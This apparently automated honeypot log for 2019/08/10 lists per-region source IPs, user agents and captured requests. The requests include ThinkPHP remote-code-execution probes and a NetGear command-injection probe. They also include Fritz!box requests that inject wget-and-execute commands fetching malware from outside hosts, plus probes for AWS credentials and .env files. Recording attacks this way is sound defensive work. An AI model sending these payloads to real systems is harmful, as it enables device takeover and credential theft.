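Honeypot (tentative) observation log for 2019/08/10.
Highlights
Region:AP
Access targeting a ThinkPHP vulnerability
Suspicious traffic involving 123[.]125[.]114[.]144
were observed.
Region:US
Access targeting an AVM Fritz!box vulnerability
Access targeting a NetGear vulnerability
Access targeting a ThinkPHP vulnerability
Scanning with masscan
Scanning for AWS credential information
Suspicious traffic involving 110[.]249[.]212[.]46
were observed.
Region:EU
Nothing in particular.
Other
Access count trend
AP: total accesses: 49 (vs. previous day: -3)
US: total accesses: 30 (vs. previous day: +13)
EU: total accesses: 9 (vs. previous day: -119)
For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.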
Region:AP
Source IP address list
Count | Source IP address | Country |
---|---|---|
4 | 103.48.192.210 | Vietnam |
1 | 115.192.209.14 | China |
1 | 119.39.46.249 | China |
1 | 123.138.79.106 | China |
1 | 124.88.112.162 | China |
1 | 125.118.6.88 | China |
1 | 125.119.13.160 | China |
1 | 171.12.10.102 | China |
1 | 175.152.31.223 | China |
1 | 175.184.165.103 | China |
1 | 180.95.231.230 | China |
1 | 180.95.238.86 | China |
5 | 185.100.87.245 | Romania |
1 | 220.250.10.34 | China |
1 | 220.250.11.215 | China |
1 | 221.11.60.147 | China |
1 | 221.13.12.238 | China |
1 | 222.94.195.248 | China |
1 | 223.166.74.80 | China |
1 | 27.115.124.70 | China |
1 | 36.32.3.59 | China |
1 | 36.47.160.39 | China |
1 | 37.49.231.15 | Estonia |
1 | 39.98.213.1 | China |
2 | 41.216.186.87 | South Africa |
4 | 42.51.0.34 | China |
1 | 47.111.6.150 | China |
1 | 58.248.202.150 | China |
4 | 59.36.132.222 | China |
1 | 60.13.6.49 | China |
1 | 66.249.70.29 | United States |
3 | 77.247.110.69 | Netherlands |
1 | 84.147.60.170 | Germany |
UserAgent list
Count | UserAgent |
---|---|
6 | - |
2 | curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.1.0zlib/1.2.3 libidn/1.18 libssh2/1.2.2 |
2 | Go-http-client/1.1 |
1 | Mozilla/5.01682558 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36(KHTML, like Gecko) Chrome/40.0.2214.89 Safari/537.36 |
1 | Mozilla/5.01724933 Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E302 |
1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) |
13 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 |
5 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
7 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
6 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
1 | python-requests/2.21.0 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
2 | CONNECT | cn[.]bing[.]com:443 | HTTP/1.1 |
4 | CONNECT | www[.]baidu[.]com:443 | HTTP/1.1 |
2 | CONNECT | www[.]voanews[.]com:443 | HTTP/1.1 |
1 | GET | ///admin/config.php | HTTP/1.1 |
1 | GET | /evox/about | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /HNAP1 | HTTP/1.1 |
2 | GET | http://boxun[.]com/ | HTTP/1.1 |
2 | GET | http://www[.]123cha[.]com/ | HTTP/1.1 |
2 | GET | http://www[.]baidu[.]com/ | HTTP/1.1 |
2 | GET | http://www[.]epochtimes[.]com/ | HTTP/1.1 |
2 | GET | http://www[.]ip[.]cn/ | HTTP/1.1 |
1 | GET | http://www[.]minghui[.]org/ | HTTP/1.1 |
2 | GET | http://www[.]rfa[.]org/english/ | HTTP/1.1 |
2 | GET | http://www[.]wujieliulan[.]com/ | HTTP/1.1 |
1 | GET | /nmaplowercheck1565349055 | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /server-status | HTTP/1.1 |
2 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
3 | GET | /TP/public/index.php | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
2 | HEAD | http://123[.]125[.]114[.]144/ | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
2 | HEAD | /robots.txt | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
2 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
2 | \x03 | | |
1 | \x16\x03\x01 | | |
Region:US
Source IP address list
Count | Source IP address | Country |
---|---|---|
1 | 110.249.212.46 | China |
1 | 172.104.242.173 | United States |
10 | 180.96.12.158 | China |
10 | 183.131.18.172 | China |
1 | 193.169.60.41 | Russia |
1 | 211.38.144.230 | South Korea |
1 | 39.98.213.1 | China |
1 | 41.216.186.87 | South Africa |
1 | 77.247.110.69 | Netherlands |
2 | 89.248.174.144 | Netherlands |
1 | 91.121.209.213 | France |
UserAgent list
Count | UserAgent |
---|---|
7 | - |
2 | Go-http-client/1.1 |
1 | masscan/1.0 (https://github.com/robertdavidgraham/masscan) |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
18 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | | |
1 | GET | /.aws/credentials | HTTP/1.0 |
1 | GET | /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20wget%20http://91[.]92[.]66[.]192/xd.sh%20%26 | HTTP/1.1 |
1 | GET | /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%cd%20%2Ftmp%2F%3B%20wget%20http%3A%2F%2F5[.]253[.]86[.]121%2Fbins%2Farm%3B%20chmod%20777%20arm%3B%20.%2Farm%20%26 | HTTP/1.1 |
2 | GET | /elrekt.php | HTTP/1.1 |
2 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
2 | GET | /index.php | HTTP/1.1 |
2 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
2 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 | HTTP/1.1 |
2 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/public/index.php | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
2 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | \x03 | | |
1 | \x16\x03\x01 | | |
Region:EU
Source IP address list
Count | Source IP address | Country |
---|---|---|
3 | 158.69.192.200 | Canada |
1 | 162.247.74.217 | United States |
1 | 185.63.64.18 | Switzerland |
1 | 211.38.144.230 | South Korea |
1 | 41.216.186.87 | South Africa |
1 | 61.219.11.153 | Taiwan |
1 | 77.247.110.69 | Netherlands |
UserAgent list
Count | UserAgent |
---|---|
3 | - |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 |
1 | Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 |
1 | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 FBSMTWB |
1 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.4) Gecko/20081029 Firefox/2.0.0.18 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | | |
1 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | /.git/index | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
1 | GET | /.o3mJzT | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
1 | \x03 | | |